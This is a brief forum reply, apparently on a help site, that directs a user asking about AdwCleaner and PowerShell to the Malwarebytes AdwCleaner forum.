A:Adwarecleaner and powershell

Hello erwin26 and
 
You may wish to consider entering your query where the AdwCleaner developers and Malwarebytes maintainer are most likely to read it.
 
Reference: Malwarebytes AdwCleaner
Thank you.

Read other 0 answers